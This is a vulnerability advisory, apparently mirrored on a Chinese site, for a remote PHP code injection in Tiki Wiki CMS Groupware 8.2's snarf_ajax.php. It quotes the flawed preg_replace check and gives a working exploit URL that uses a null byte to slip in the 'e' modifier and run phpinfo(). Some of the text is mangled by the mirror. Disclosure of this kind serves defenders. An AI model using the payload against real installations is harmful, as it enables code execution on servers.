-------------------------------------------------------------------------
Tiki Wiki CMS Groupware <= 8.2 (snarf_ajax.php) Remote PHP Code Injection
-------------------------------------------------------------------------
作者: Egidio Romano aka EgiX HdhCmsTest2cto测试数据 n0b0d13s[at]gmail[dot]com
软件地址: http://info.tiki.org/
[-]缺陷解释:
问题代码位置/lib/wiki-plugins/wikiplugin_snarf.php:
170. // If the user specified a more specialized regex
171. if ( isset($params['regex']) && isset($params['regexres']) && preg_match('/^(.)(.)+\1[^e]*$/', $params['regex']) ) {
172. $snarf = preg_replace( $params['regex'], $params['regexres'], $snarf );
173. }
input passed through $_REQUEST['regex'] is checked by a regular expression at line 171 to prevent
execution of arbitrary PHP code using the 'e' modifier in a call to preg_replace() at line 172.
But this check could be bypassed with a null byte injection, requesting an URL like this:
http://HdhCmsTest2cto测试数据 /tiki-8.2/snarf_ajax.php?url=1®exres=phpinfo()®ex=//e%00/
Tiki internal filters remove all null bytes from user input, but for some strange reason this
doesn't happen within admin sessions. So, successful exploitation of this vulnerability requires
an user account with administration rights and 'PluginSnarf' to be enabled (not by default).
查看更多关于Tiki Wiki CMS Groupware <= 8.2 (snarf_ajax.php)的详细内容...